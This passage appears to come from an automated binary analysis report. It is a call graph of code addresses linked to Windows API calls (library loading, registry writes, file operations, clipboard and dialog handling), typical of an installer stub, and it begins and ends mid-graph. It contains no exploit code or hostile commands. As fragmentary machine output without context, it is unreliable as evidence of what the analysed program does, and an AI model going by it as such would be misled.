4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 